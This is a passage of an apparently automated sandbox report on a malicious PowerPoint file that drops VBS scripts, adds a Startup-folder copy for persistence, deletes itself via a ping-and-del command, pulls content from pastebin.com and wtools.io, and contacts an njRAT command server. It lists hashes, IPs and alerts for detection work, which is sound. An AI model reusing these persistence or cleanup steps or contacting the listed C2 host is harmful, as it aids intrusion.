MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\usp10.dll
c:\windows\system32\lpk.dll
3236cmd.exe /c ping 127.0.0.1 -n 7 & del "C:\Users\admin\AppData\Local\Temp\bFvBy.vbs"C:\Windows\system32\cmd.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
3372ping 127.0.0.1 -n 5 C:\Windows\system32\PING.EXEcmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
TCP/IP Ping Command
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\ping.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\nsi.dll
3384ping 127.0.0.1 -n 7 C:\Windows\system32\PING.EXEcmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
TCP/IP Ping Command
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\ping.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\nsi.dll
2088"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft .NET Assembly Registration Utility
Version:
4.0.30319.34209 built by: FX452RTMGDR
Modules
Images
c:\windows\microsoft.net\framework\v4.0.30319\regasm.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\apppatch\acgenral.dll
c:\windows\system32\sechost.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\rpcrt4.dll
Total events
16 820
Read events
16 551
Write events
264
Delete events
5

Modification events

(PID) Process:(1912) POWERPNT.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\PowerPoint\Resiliency\StartupItems
Operation:writeName:6o2
Value:
366F320078070000010000000000000000000000
(PID) Process:(1912) POWERPNT.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1033
Value:
Off
(PID) Process:(1912) POWERPNT.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1041
Value:
Off
(PID) Process:(1912) POWERPNT.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1046
Value:
Off
(PID) Process:(1912) POWERPNT.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1036
Value:
Off
(PID) Process:(1912) POWERPNT.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1031
Value:
Off
(PID) Process:(1912) POWERPNT.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1040
Value:
Off
(PID) Process:(1912) POWERPNT.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1049
Value:
Off
(PID) Process:(1912) POWERPNT.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:3082
Value:
Off
(PID) Process:(1912) POWERPNT.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1042
Value:
Off
Executable files
0
Suspicious files
7
Text files
6
Unknown types
3

Dropped files

PID
Process
Filename
Type
1912POWERPNT.EXEC:\Users\admin\AppData\Local\Temp\CVR97A3.tmp.cvr
MD5:
SHA256:
1912POWERPNT.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\78RFYB7Z\VmFAVTLu[1].txttext
MD5:7B5425660E0B60B0D017FE06A0205B58
SHA256:29C32CDEB327826650A503ABD949964763B93ECF4054B40208BCE2BC32AE7359
1912POWERPNT.EXEC:\Users\admin\AppData\Local\Temp\bFvBy.vbstext
MD5:9E89ECDDC177F7D46517DF67BA7B3671
SHA256:5833D39A12362E79F080AA19B15141F8396D24BE9A3718CE1378471814A64832
1912POWERPNT.EXEC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27binary
MD5:29D6EE4C2C7528AF5B32C3F4ECE09654
SHA256:958E75B9B3FDB651154104AADB66863EF89D464AF80CEC1B4E699AFA15FC6904
1912POWERPNT.EXEC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27der
MD5:9B04B5F2AE9BCC677FF9CF2BF9FB3991
SHA256:D89168D15D277228C86CB62008238BA181806F6D6FE5988246D9F3B3344AB4C7
1912POWERPNT.EXEC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157binary
MD5:2FD3ADD55E4D02D9F02A579CF476D9BC
SHA256:C611B58ED2B652F66691B2350447F36C41C0555AAF4983260A95660A0CD4319F
3244cmd.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\FKZVX.vbstext
MD5:9E89ECDDC177F7D46517DF67BA7B3671
SHA256:5833D39A12362E79F080AA19B15141F8396D24BE9A3718CE1378471814A64832
1912POWERPNT.EXEC:\Users\admin\AppData\Local\Temp\VBE\MSForms.exdtlb
MD5:BB324B9CBC527E21A590704F4AC91EF4
SHA256:A647E2A7F63C880B702D4456B13FEBDAE1ED575AB1AF643E528558871CD3A51B
1912POWERPNT.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\B6QGX7LP\hhhhhhhh[1].txttext
MD5:73384B143CD0EA376CE992A8AA21D7F8
SHA256:58C562A4CE0BEC25F7495B7B97E3FAF527AC2A150BED7DA54BBE3B7DFA5A68EC
2284powershell.exeC:\Users\admin\AppData\Local\Temp\gec2t2ow.iof.ps1binary
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
12
DNS requests
5
Threats
3

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
1912
POWERPNT.EXE
GET
200
93.184.220.29:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEAo3h2ReX7SMIk79G%2B0UDDw%3D
US
der
1.47 Kb
whitelisted
1912
POWERPNT.EXE
GET
200
209.197.3.8:80
http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?b82b9b1ac46e0e21
US
compressed
4.70 Kb
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
1912
POWERPNT.EXE
93.184.220.29:80
ocsp.digicert.com
MCI Communications Services, Inc. d/b/a Verizon Business
US
whitelisted
2284
powershell.exe
172.67.34.170:443
pastebin.com
US
malicious
1912
POWERPNT.EXE
172.67.34.170:443
pastebin.com
US
malicious
2088
RegAsm.exe
172.67.34.170:443
pastebin.com
US
malicious
1332
WScript.exe
172.67.34.170:443
pastebin.com
US
malicious
1912
POWERPNT.EXE
172.67.135.130:443
wtools.io
US
suspicious
1912
POWERPNT.EXE
209.197.3.8:80
ctldl.windowsupdate.com
Highwinds Network Group, Inc.
US
whitelisted
2284
powershell.exe
172.67.135.130:443
wtools.io
US
suspicious
2088
RegAsm.exe
179.48.155.124:5552
Connexions4London Ltd
PA
malicious
1332
WScript.exe
172.67.135.130:443
wtools.io
US
suspicious

DNS requests

Domain
IP
Reputation
pastebin.com
  • 172.67.34.170
  • 104.20.67.143
  • 104.20.68.143
shared
ctldl.windowsupdate.com
  • 209.197.3.8
whitelisted
ocsp.digicert.com
  • 93.184.220.29
whitelisted
wtools.io
  • 172.67.135.130
  • 104.21.6.247
suspicious
dns.msftncsi.com
  • 131.107.255.255
shared

Threats

PID
Process
Class
Message
Potential Corporate Privacy Violation
ET POLICY Observed DNS Query to Pastebin-style Service (wtools .io)
A Network Trojan was detected
ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll)
1 ETPRO signatures available at the full report
No debug info